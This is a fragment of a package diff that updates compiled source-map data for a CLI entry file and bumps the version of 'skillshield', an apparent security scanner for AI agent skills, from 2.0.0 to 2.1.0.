,CAAC,QAAQ,EAAE,GAAG,EAAE;IACjB,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,YAAY,CAAC,CAAC,CAAC;IACtC,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,eAAe,CAAC,CAAC,CAAC;IACzC,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,sEAAsE,CAAC,CAAC,CAAC;IAChG,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,+EAA+E,CAAC,CAAC,CAAC;IACzG,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,0EAA0E,CAAC,CAAC,CAAC;IACpG,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,yEAAyE,CAAC,CAAC,CAAC;IACnG,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,mEAAmE,CAAC,CAAC,CAAC;IAC7F,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,wEAAwE,CAAC,CAAC,CAAC;IAClG,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,sEAAsE,CAAC,CAAC,CAAC;AAClG,CAAC,CAAC,CAAC;AAEL,kBAAkB;AAClB,IAAI,CAAC,OAAO,CAAC,CAAC;AACd,GAAG,CAAC,OAAO,CAAC,CAAC;AACb,IAAI,CAAC,OAAO,CAAC,CAAC;AACd,MAAM,CAAC,OAAO,CAAC,CAAC;AAChB,OAAO,CAAC,OAAO,CAAC,CAAC;AACjB,IAAI,CAAC,OAAO,CAAC,CAAC;AACd,MAAM,CAAC,OAAO,CAAC,CAAC;AAChB,MAAM,CAAC,OAAO,CAAC,CAAC;AAChB,KAAK,CAAC,OAAO,CAAC,CAAC;AAEf,uBAAuB;AACvB,OAAO,CAAC,EAAE,CAAC,oBAAoB,EAAE,CAAC,MAAM,EAAE,EAAE;IAC1C,OAAO,CAAC,KAAK,CAAC,KAAK,CAAC,GAAG,CAAC,sBAAsB,CAAC,EAAE,MAAM,CAAC,CAAC;IACzD,OAAO,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC;AAClB,CAAC,CAAC,CAAC;AAEH,oBAAoB;AACpB,OAAO,CAAC,KAAK,CAAC,OAAO,CAAC,IAAI,CAAC,CAAC;AAE5B,0BAA0B;AAC1B,IAAI,CAAC,OAAO,CAAC,IAAI,CAAC,KAAK,CAAC,CAAC,CAAC,CAAC,MAAM,EAAE,CAAC;IAClC,OAAO,CAAC,UAAU,EAAE,CAAC;AACvB,CAAC"}
1
+ {"version":3,"file":"index.js","sourceRoot":"","sources":["../../src/cli/index.ts"],"names":[],"mappings":"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"}
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "skillshield",
3
- "version": "2.0.0",
3
+ "version": "2.1.0",
4
4
  "description": "Runtime security for AI Agent Skills — Scan, sandbox & enforce. Detect prompt injection, memory poisoning, supply chain attacks. 72+ patterns, 14 categories. The firewall Snyk and Cisco don't build.",
5
5
  "type": "module",
6
6
  "main": "./dist/index.js",